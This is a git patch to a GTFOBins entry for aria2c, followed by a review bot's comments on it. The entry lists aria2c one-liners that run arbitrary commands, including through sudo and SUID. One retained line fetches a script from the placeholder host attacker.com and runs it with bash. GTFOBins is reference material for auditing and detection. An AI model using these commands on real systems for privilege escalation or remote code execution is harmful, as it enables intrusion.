From 17c3e974a782843de09c5c96529578dbea8aa94b Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Fri, 7 Sep 2018 13:30:55 +0200
Subject: [PATCH] Add a full local version of aria2c and add --allow-overwrite

Close #22
---
 _gtfobins/aria2c.md | 28 +++++++++++++++++++++-------
 1 file changed, 21 insertions(+), 7 deletions(-)

diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md
index 941e371..7fc49c4 100644
--- a/_gtfobins/aria2c.md
+++ b/_gtfobins/aria2c.md
@@ -1,13 +1,27 @@
 ---
-description: |
- Note that the subprocess is immediately sent to the background.
-
- The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed.
+description: Note that the subprocess is immediately sent to the background.
 functions:
 execute-non-interactive:
- - code: aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
+ - code: |
+ COMMAND='id'
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ aria2c --on-download-error=$TF http://x
+ - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed.
+ code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
 suid-enabled:
- - code: ./aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
+ - code: |
+ COMMAND='id'
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ ./aria2c --on-download-error=$TF http://x
 sudo-enabled:
- - code: sudo aria2c --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
+ - code: |
+ COMMAND='id'
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo aria2c --on-download-error=$TF http://x
 ---
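Review bot: The three new `code: |` entries (under execute-non-interactive, suid-enabled and sudo-enabled) have no `description`, so the page never states that `http://x` is only there to make the download fail and that `--on-download-error` is what runs the temporary file; anyone auditing a host or writing a detection from this entry has to infer it. I would add, per entry or once at the top level, `description: The download is expected to fail; aria2c then runs the temporary file as its error hook. The file is left on disk afterwards.` The snippets also leave `$TF` unquoted in `echo "$COMMAND" > $TF` and `chmod +x $TF`, which breaks when `TMPDIR` contains whitespace; `"$TF"` is the safer form in all three copies. In the retained remote entry, "16 hex digit" should read "16 hex digits".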